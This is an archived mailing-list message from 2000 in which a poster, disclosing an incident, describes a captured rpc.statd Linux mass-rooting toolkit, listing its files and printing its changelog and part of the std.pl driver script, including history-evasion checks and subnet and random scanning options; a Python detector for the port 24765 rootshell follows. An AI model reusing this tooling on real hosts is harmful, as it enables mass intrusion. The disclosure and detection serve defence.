subject: (Fwd) More info regarding: std.pl, the rpc.statd linux mass ro
posted: Mon, 18 Dec 2000 20:04:37 -0000

------- Forwarded message follows -------
Date sent: Fri, 15 Dec 2000 09:36:44 -0600
Send reply to: marc <[email protected]>
From: marc <[email protected]>
Subject: More info regarding: std.pl, the rpc.statd linux mass rooter
To: [email protected]

I've heard different things from a lot of people about this. I do not
feel comfortable posting the script itself, but I will post some
additional information about it.

The perl script does not look like an amateur job; it has some good coding
and error checking. And it worked well at finding and compromising boxes;
there were quite a few logged when we found it.

I will take the full script and send it to CERT, who has requested a copy,
but I do not plan to distribute it to anyone else.

-rw-rw-r-- 1 marc marc 19 Nov 29 02:36 .config
-rw-rw-r-- 1 marc marc 105 Nov 30 01:29 207.92.root
-r-------- 1 marc marc 430 Oct 30 01:33 CHANGES
-r-------- 1 marc marc 107 Oct 22 02:26 README
-r-x------ 1 marc marc 320 Oct 13 22:23 config
-r-x------ 1 marc marc 15457 Oct 13 18:33 no
-r-x------ 1 marc marc 7273 Aug 7 21:46 pc
-rwxr-xr-x 1 marc marc 19438 Oct 14 00:36 st
-rwxrwx--- 1 marc marc 6171 Oct 30 01:32 std.pl

207.92.root: ASCII text
CHANGES: English text
README: English text
config: Bourne shell script text
no: ELF 32-bit LSB executable, Intel 80386, version 1,
dynamically linked (uses shared libs), not stripped
pc: ELF 32-bit LSB executable, Intel 80386, version 1,
dynamically linked (uses shared libs), not stripped
st: ELF 32-bit LSB executable, Intel 80386, version 1,
dynamically linked (uses shared libs), not stripped
std.pl: perl commands text

pc is the port scanner. The script has it search for only port 111.
no is a notify daemon. (?)
st is the exploit to root the box and leave the rootshell.
std.pl is the perl script that runs the show.

::::::::::::::
CHANGES
::::::::::::::
Change log

0.2 -> 0.2+p1:
- multiple copies can run on one server now
- cleaned up the script, converted most system() commands into real perl
- added signal handler
- made more verbose errors
- auto random scans now reloops through the file, doesn't spawn children
of the script anymore

0.2+p1 -> 0.2+p2:
- fixed a big prob in +p1 that made the script not work

0.2+p2 -> 0.2+p3:
- fixed a minor prob, nothing worth mentioning
::::::::::::::
README
::::::::::::::
Before using std.pl you must run ./config to set required values
or the script will not function properly.

::::::::::::::
std.pl
::::::::::::::
#!/usr/bin/perl
#
# std.pl v0.2+p3 by KraZee - 10.30.00 private
# rpc.statd linux mass rooter [epic]
#
# binds rootshell on port 24765 on exploited hosts
# standard disclaimers apply
#
# DO NOT DISTRIBUTE !! DO NOT DISTRIBUTE

$numofargs=@ARGV;
$option=@ARGV[0];
$prefix=@ARGV[1];
$auto=@ARGV[2];
use File::Basename;
$progname=basename($0);
$SIG{INT}=\&catch_sig;
$hist=$ENV{HISTFILE};
$histlength=length($hist);

print "\nstd.pl v0.2+p3 private - by KraZee\nrpc.statd linux mass rooter\n\n";

if ($histlength != "0" && $hist ne "/dev/null") {
print "naughty boy you forgot to redirect HISTFILE\n\n";
}

if (not -e ".config") {
print "* error: configuration not set, run ./config\n\n";
exit;
} else {
unless(open (CONFIG, "< .config")) { &cleanup; die "* error, unable to read configuration: $!\n\n"; }
$config="";
$config=<CONFIG>;   # read the single line written by ./config (angle brackets lost in the original posting)
chop $config;
($ip, $childs)=split(" ", $config);
close(CONFIG);
if ($ip eq "" || $childs == "") {

...

sub help {
print "usage: $progname \n\n";
print "configuration:\n";
print "server: $ip childs: $childs\n\n";
print "options:\n";
print "-s scan class b/c subnet\n";
print "-f scan ips in ip database (no hostnames!)\n";
print "-r scan random class b's (specify class a)\n";
print "use '-r auto' to loop new scans\n\n";
}


------- End of forwarded message -------
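A host-side check for the backdoor described in the script header above (a rootshell bound on port 24765), added here as an example and not part of the forwarded message or the tool: it parses the Linux `/proc/net/tcp` socket table and flags any socket in LISTEN state on that port. The sample table is constructed; the function names and `ROOTSHELL_PORT` constant are assumptions for this example.

```python
# Port the std.pl rootshell binds on compromised hosts (from the script header).
ROOTSHELL_PORT = 24765
TCP_LISTEN = 0x0A  # socket state value the kernel uses for LISTEN

# Constructed sample of /proc/net/tcp: portmapper (111) listening, one
# established ssh session on loopback, and a LISTEN on 24765 (0x60BD).
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:006F 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1001 1 00000000 100 0 0 10 0
   1: 0100007F:0016 0100007F:A3F2 01 00000000:00000000 00:00000000 00000000     0        0 1002 1 00000000 100 0 0 10 0
   2: 00000000:60BD 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1003 1 00000000 100 0 0 10 0
"""


def parse_proc_net_tcp(text):
    """Return (local_ip, local_port, state, uid, inode) for each socket row."""
    rows = []
    for line in text.splitlines()[1:]:  # skip the header row
        fields = line.split()
        if len(fields) < 10:
            continue
        ip_hex, port_hex = fields[1].split(":")
        # The kernel prints IPv4 addresses as little-endian hex, so walk the bytes backwards.
        ip = ".".join(str(int(ip_hex[i:i + 2], 16)) for i in (6, 4, 2, 0))
        rows.append((ip, int(port_hex, 16), int(fields[3], 16), int(fields[7]), fields[9]))
    return rows


def find_listeners(text, ports):
    """Return the sockets in LISTEN state bound to any port in `ports`."""
    return [r for r in parse_proc_net_tcp(text) if r[2] == TCP_LISTEN and r[1] in ports]


def rootshell_listener_present(text=SAMPLE_PROC_NET_TCP):
    """True if something is listening on the std.pl rootshell port."""
    return bool(find_listeners(text, {ROOTSHELL_PORT}))


if __name__ == "__main__":
    # On a live host, replace the sample with open("/proc/net/tcp").read().
    for ip, port, _, uid, inode in find_listeners(SAMPLE_PROC_NET_TCP, {ROOTSHELL_PORT}):
        print(f"suspicious listener {ip}:{port} uid={uid} inode={inode}")
```

The inode value lets you map a flagged socket back to its owning process via `/proc/*/fd`.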

generated by msg2page 0.06 on Jul 21, 2006 at 19:04:56